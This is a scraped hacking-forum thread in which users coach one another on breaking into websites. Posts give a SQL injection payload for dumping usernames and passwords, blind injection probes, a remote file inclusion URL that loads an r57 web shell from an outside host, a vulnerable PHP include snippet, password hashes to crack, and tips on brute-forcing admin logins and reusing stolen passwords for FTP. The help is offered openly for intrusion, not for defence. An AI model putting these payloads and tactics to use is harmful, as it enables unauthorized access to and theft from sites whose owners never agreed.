 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
|
nobody can help me,sad ....  |
|
|
|
|
yeap,it is
C4E097C3EA722BE3E2D9B365ACF7F2DAB1CA0120
Anyone can help me or tell me how to do now,thx u very much  |
|
|
|
|
try this
' and 1=2 union select user,password from users where ''='[/quote] |
|
|
|
|
thx u very much  |
|
|
|
|
use mysql shell or some php shell like r57,c99 to connect database
mysql shell
<?php
/*
* MySQL Shell v1.0
*
* Judd Vinet <jvinet@zeroflux.org>
* March 3, 2007
* Licensed un ... |
|
|
|
|
+Or u can find admin password and use it to login FTP if u lucky
+Find upload page,add upload file such as php if their databse support it (avatar ...) |
|
|
|
|
eae95be0ae3ae7e53516fe402170b9a9
9b14b7a4a7935532c23b3b0962807f36
Thank you  |
|
|
|
|
| maybe local attack |
|
|
|
|
| first is path disclose but u must show when u get this error,did u input some incorrect data ??? |
|
|
|
|
include like that
sitebug.com/index.php?url=http://yoursite.com/r57.txt?
instead of
sitebug.com/index.php?url=http://yoursite.com/r57.php?
 |
|
|
|
|
i have a site like that
site.com/sql.php?id=1 and 1=2/*
Return false
site.com/sql.php?id=1 and 1=1/*
return true
site.com/sql.php?id=1 union select 1 from table/*
False because this ... |
|
|
|
|
+try to brute roce admin account
+Find version of forum site.com/forum/docs/CHANGELOG.html then use some exploits to hack it
+If u can,view their phpbbcode and find bus
Good Luck |
|
|
|
|
| try to use john the ripper |
|
|
|
|
<?php
if($_GET['file'])
include($_GET['file']);
?> |
|
|
|
|
| base64 can decode,encode easy,try google please |
|
|
| Page 1 of 2 |
Goto page 1, 2Next
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 124
Members: 0
Total: 124
